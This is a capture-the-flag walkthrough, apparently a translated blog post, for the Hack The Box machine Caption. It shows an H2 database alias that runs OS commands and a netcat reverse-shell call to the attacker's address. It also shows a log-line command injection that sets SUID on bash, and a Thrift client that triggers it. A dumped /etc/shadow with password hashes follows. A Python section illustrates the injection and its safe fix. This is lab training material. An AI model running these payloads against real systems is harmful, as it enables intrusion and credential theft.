Scanning the target
nmap -T4 -A -v 10.10.11.33
The scan shows 5 open ports and a hostname, caption.htb (add it to /etc/hosts so the vhost resolves). Open port 80 first.
This looks pretty nice; I'll save the site once I get a shell ~ Unfortunately there are no credentials, so let's look at port 8080 instead.
Browse around a bit. Clicking System administration in the top-right corner leads to a database console that lets you run arbitrary SQL, including writes.
You can follow this article to get a shell; it abuses an H2 user-defined alias to compile Java code inside the database, and from there run OS commands:
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}$$;
CALL SHELLEXEC('busybox nc 10.10.14.xx 9999 -e sh')
Start a listener on port 9999 on the attacking host before the CALL (10.10.14.xx is your own VPN address); the CALL blocks for as long as the reverse shell stays connected. The Scanner delimiter has to be written "\\A" in the Java source, since "\A" is not a valid Java escape and the alias would fail to compile.
That gives a shell and the user flag. For convenience, generate a key pair with ssh-keygen -t rsa, append the public key to the user's ~/.ssh/authorized_keys on the target, and log in over SSH.
Looking at listening sockets on the box, there is a port 9090 bound to localhost. Forward it out with SSH local port forwarding; it is not a web service, so it will not open in a browser. On to privilege escalation: create a malicious.log and a shell script with the contents below, and put both in /tmp on the target. The log line smuggles a shell command into the user-agent field, which the log service (running with root privileges) passes into a shell command; payload.sh then sets the SUID bit on /bin/bash.
malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
payload.sh
chmod +s /bin/bash
log_service.thrift
namespace go log_service
service LogService {
string ReadLogFile(1: string filePath)
}
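Why the malicious.log line above gives command execution: the injection only works if the log service splices the quoted "user-agent" value into a shell command string. The following Python is an added illustration of that pattern and of its hardened counterpart, not the Caption box's real service code (which is Go, per the namespace line, and is not shown on this page). The grep command, the /var/log/requests.log path, the field-extraction rule and the two sample log lines are constructed assumptions.

```python
"""Illustration of the user-agent command injection behind malicious.log.

Added example, not the box's log service: it assumes the service pulls the
quoted "user-agent" value out of each line and pastes it into a shell
command string. The command, the log path and the sample lines are made up.
"""
from __future__ import annotations

import shlex

# Constructed sample lines (not captured from the target). The second has
# the exact shape of the malicious.log payload above.
BENIGN_LINE = '127.0.0.1 "user-agent":"Mozilla/5.0"'
MALICIOUS_LINE = '127.0.0.1 "user-agent":"\'; /bin/bash /tmp/payload.sh #"'

# Hypothetical file the service greps for the user-agent string.
LOG_DB = "/var/log/requests.log"


def extract_user_agent(line: str) -> str:
    """Return the value between "user-agent":" and the final double quote.

    Assumed field layout, chosen to match the payload line on the page.
    """
    marker = '"user-agent":"'
    start = line.index(marker) + len(marker)
    end = line.rindex('"')
    return line[start:end]


def build_command_unsafe(line: str) -> str:
    """Vulnerable pattern (hypothetical): the field is interpolated into a
    single-quoted shell string. A leading ' in the value closes that quote,
    ; ends the grep command and # comments out the dangling quote and path.
    """
    return f"grep -c '{extract_user_agent(line)}' {LOG_DB}"


def build_command_safe(line: str) -> list[str]:
    """Hardened pattern: pass the field as one argv element and run it
    without a shell (subprocess.run(argv)). Quotes, ; and # are then data.
    """
    return ["grep", "-c", extract_user_agent(line), LOG_DB]


def shell_commands(cmd: str) -> list[list[str]]:
    """Tokenise cmd the way a POSIX shell would and split on ';' to show
    how many separate commands the shell would actually run."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=";")
    lexer.whitespace_split = True
    lexer.commenters = "#"  # an unquoted # starts a comment, as in sh
    commands: list[list[str]] = []
    current: list[str] = []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def compare(line: str) -> tuple[list[list[str]], list[list[str]]]:
    """Commands the shell would run for the unsafe string vs. the safe argv
    (rendered back to a shell string with shlex.join for the comparison)."""
    unsafe = shell_commands(build_command_unsafe(line))
    safe = shell_commands(shlex.join(build_command_safe(line)))
    return unsafe, safe


if __name__ == "__main__":
    for name, line in (("benign", BENIGN_LINE), ("malicious", MALICIOUS_LINE)):
        unsafe, safe = compare(line)
        print(f"{name}: unsafe string runs {len(unsafe)} command(s): {unsafe}")
        print(f"{name}: safe argv     runs {len(safe)} command(s): {safe}")
```

For the malicious line the unsafe string tokenises into two commands, the second being /bin/bash /tmp/payload.sh, while the argv form keeps the whole payload as a single grep argument. The same holds for any value that can break out of the quoting the service uses, which is why the fix is to stop going through a shell rather than to filter characters.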
The Thrift compiler can be installed as described here:
https://thrift-tutorial.readthedocs.io/en/latest/installation.html
apt install thrift-compiler
thrift -r --gen py log_service.thrift
Then change into the generated gen-py folder and create a client script (the Python thrift package is needed as well):
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # generated Thrift client code (gen-py/log_service)


def main():
    # Transport to the server: the forwarded port 9090 on localhost
    transport = TSocket.TSocket('localhost', 9090)
    # Buffered transport for better performance
    transport = TTransport.TBufferedTransport(transport)
    # Binary protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    # Client object for the LogService service
    client = LogService.Client(protocol)
    # Open the connection
    transport.open()
    try:
        # Path of the log file the service should process
        log_file_path = "/tmp/malicious.log"
        # Call the remote ReadLogFile method and collect the result
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
    except Thrift.TException as tx:
        # Catch Thrift exceptions
        print(f"Thrift exception: {tx}")
    finally:
        # Close the transport
        transport.close()


if __name__ == '__main__':
    main()
Then run bash -p on the target: with the SUID bit set by payload.sh this yields a root shell, and /etc/shadow is now readable:
root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19474:0:99999:7:::
lxd:!:19474::::::
haproxy:!:19788:0:99999:7:::
varnish:*:19788:0:99999:7:::
vcache:*:19788:0:99999:7:::
varnishlog:*:19788:0:99999:7:::
margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::
ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::
_laurel:!:19965::::::
Originally published on the WeChat public account (Jiyou too beautiful): HTB-Caption notes (quick version)